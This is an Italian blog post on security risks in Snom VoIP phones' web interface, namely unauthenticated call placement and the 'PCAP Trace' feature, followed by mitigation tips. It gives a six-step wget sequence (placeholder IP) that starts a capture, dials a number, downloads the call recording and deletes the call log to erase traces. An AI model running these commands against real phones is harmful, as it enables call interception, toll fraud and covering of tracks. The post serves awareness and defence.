VoIP and Hacking | Consulenza Documentazione

Originariamente volevo intitolare questo post “Vunerabilità degli Snom phones” o giù di lì, per poi ripiegare sull’attuale, dopo aver considerato che più che di vulnerabilità, in questo caso bisognerebbe parlare di funzionalità estremamente pericolose.

Tra le funzionalità degli attuali VoIP phones Snom, vi è ad esempio una pagina web, servita dal relativo webserver del telefono, che permette l’introduzione di un numero, e quindi di chiamarlo. Dal punto di vista dell’utente, tale feature avvierebbe una chiamata in viva voce sul proprio Snom.
Tutto sommato una feature utile, a patto però che lo Snom abbia l’ autenticazione sul webserver impostata, altrimenti chiunque avesse accesso a quella webpage potrebbe originare una chiamata.

Tramite tale feature infatti, un attaccante potrebbe andare alla ricerca di Snom phones esposti pubblicamente su Internet, determinare se utilizzino la  autenticazione HTTP , e nel caso così non fosse, potrebbe senza alcun ostacolo connettersi al webserver dello Snom VoIP phone e introdurre un numero da chiamare, talvolta causando rilevanti danni economici, con chiamate a numeri ad alta fatturazione, costose telefonate internazionali, ecc.

Inoltre potrebbe ottenere facilmente informazioni importanti sulla configurazione della rete interna.

Qualcuno potrebbe obiettare giustamente che tali o simili funzionalità amministrative sono appannaggio di tutti i telefoni VoIP, e non esclusivamente degli Snom. Certo, ma ad un attaccante uno Snom offre qualcosa di più, dato che potrebbe direttamente catturare remotamente tramite il phone gli streams vocali di una chiamata!

Alcuni VoIP phones Snom possiedono difatti una ulteriore feature chiamata “PCAP Trace” che permette, sempre attraverso la interfaccia web, l’avvio, l’interruzione ed il download di un file PCAP dallo Snom VoIP phone.

La feature PCAP Trace dello Snom sofre di alcune limitazioni, in quanto i dati PCAP vengono registrati in un buffer circolar a causa degli ovvi limiti di memoria, e che l’attivazione della cattura PCAP può influire sulle performance dell’apparecchio.

Ciò nonostante, si tratta di una funzionalità che se non adeguatamente filtrata costituisce un vettore di attacco tramite il quale un attaccante remoto può letteralmente intercettare le conversazioni.

Per avviare/interrompere una cattura PCAP sul VoIP phone Snom, basta solamente cliccare sui pulsanti ‘Start’ o ‘Stop’ sulla webpage. Quando la cattura è completa, l’ attaccante può quindi effettuare il download del file trace PCAP ed estrarne l’audio usando Wireshark o altri tools.

Ecco in sintesi i sei passi necessari per verificare quanto sia semplice questa operazione, combinando le tecniche citate in precedenza.

Step 1: Avviamento della cattura sfruttando l’interfaccia Web Snom
# wget –post-data'start_pcap=Start' http://XXX.XXX.XXX.XXX/pcap.htm -O log_XXX.XXX.XXX.XXX/inizio_cattura.html

Step 2: Avviare la chiamata tramite la interfaccia Web Snom
# wget –post-data='NUMBER="061234567"&DIAL=Dial&active_line=1' http://XXX.XXX.XXX.XXX/ -O log_XXX.XXX.XXX.XXX/chiamata.html

Step 3: Interrompere la cattura sempre tramite la interfaccia Web Snom
# wget –post-data='stop_pcap=Stop' http://XXX.XXX.XXX.XXX/pcap.htm -O logz_XXX.XXX.XXX.XXX/fine_cattura.html

Step 4: Ottenere il file PCAP dallo Snom
# wget http://XXX.XXX.XXX.XXX/trace.pcap -O log_XXX.XXX.XXX.XXX/chiamata.pcap

Step 5: Passare a wireshark (ben configurato) il file per estrarne gli stream RTP, mixarli e ascoltarli direttamente

Step 6: Dulcis in fundo, cancellare le tracce, almeno sul phone, dell’ultima chiamata
wget http://XXX.XXX.XXX.XXX/adr.htm?dialeddel=1 -O log_XXX.XXX.XXX.XXX/cancellazione_traccia.html

Ciò che rende questo genere di feature particolarmente rischiosa sono due cose:

1. Vulnerabilità conosciute o future presenti in alcuni apparecchi Snom consentono ad un attaccante di bypassare addirittura l’autenticazione.
2. Motori di ricerca come Shodan rendono facile la localizzazione di phones Snom vulnerabili.

Mitigazione del rischio

Alcuni semplici suggerimenti su come mitigare i rischi:

• Evitare assolutamente di esporre i VoIP phones su IP pubblici se possibile
• Abilitare l’autenticazione della interfaccia web del VoIP phone utilizzando una password forte
• Inviare automaticamente i logs del phone ad un altro server ed esaminarli periodicamente alla ricerca di abusi
• Addestrare gli utenti a riconoscere quando il loro VoIP phone è compromesso (particolare lentezza nel funzionamento, etc.)
• Evitare di cedere alla loro puntuale richiesta di ottenere la password amministrativa per i soliti futili motivi (personalizzazione della suoneria, ecc.)

Send post as PDF to